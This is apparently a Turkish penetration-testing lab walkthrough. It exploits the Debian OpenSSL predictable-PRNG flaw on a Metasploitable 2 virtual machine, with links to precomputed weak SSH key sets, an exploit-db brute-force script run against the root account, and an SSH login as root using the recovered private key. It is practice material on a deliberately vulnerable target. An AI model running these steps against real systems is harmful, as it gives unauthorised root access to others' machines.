Metasploitable 2 üzerindeki OpenSSL sürümü 0.9.8g olduğu görülmektedir.
openssl version
Bu sürüme ait bir çok zafiyet bulunmaktadır.
Bunlardan birisi de OpenSSL kütüphanesinin rastgele sayı üreticindeki “OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) – Predictable PRNG Brute Force SSH” isimli bir zafiyettir. Bu zafiyet ile zayıf / tahmin edilebilir sayılar üretilmektedir. Zafiyete istismar kodu exploit-db üzerinde bulunabilir.
https://www.exploit-db.com/exploits/5632/
Zafiyet ile ilgili detay için g0tmi1k’in Github yazısı incelenebilir:
https://github.com/g0tmi1k/debian-ssh
Ortak kullanılan anahtarlar belirtilen bağlantıdan indirilir.
DSA Anahtarları: http://www.exploit-db.com/sploits/debian_ssh_dsa_1024_x86.tar.bz2
RSA Anahtarları: http://www.exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
İndirilen sıkıştırılmış dosyalar dışarıya çıkarılır.
ls -la
ls -la rsa/2048 | more
İndirilen 5632 ruby betiği kullanılarak 192.168.5.106 IP adresli Metasploitable 2 bilgisayarın SSH servisine root kullanıcısı verilerek SSH özel anahtarları ile kaba kuvvet saldırısı gerçekleştirilir.
ruby ./5632.rb 192.168.5.106 root ./rsa/2048
Not: SSH anahtarı (/Ev_Dizini/.ssh/authorized_keys) bir şekilde elde edildiyse, herhangi bir betik kullanılmadan da ilgili anahtar tespit edilebilirdi.
grep -lr <Anahtar> ./rsa/2048/*.pub
SSH özel anahtarı tespit edilmiştir.
cat rsa/2048/57c3115d77c56390332dc5c49978627a-5429
Tespit edilen SSH özel anahtarı kullanılarak root kullanıcısı ile oturum açılabilir.
ssh root@192.168.5.106 -i 57c3115d77c56390332dc5c49978627a-5429
Belirtilen / benzer zafiyetin (5720) bulunduğu diğer sanal ortamlardan bazıları aşağıdaki gibidir:
- pWnOS: 1.0: https://www.vulnhub.com/entry/pwnos-10,33/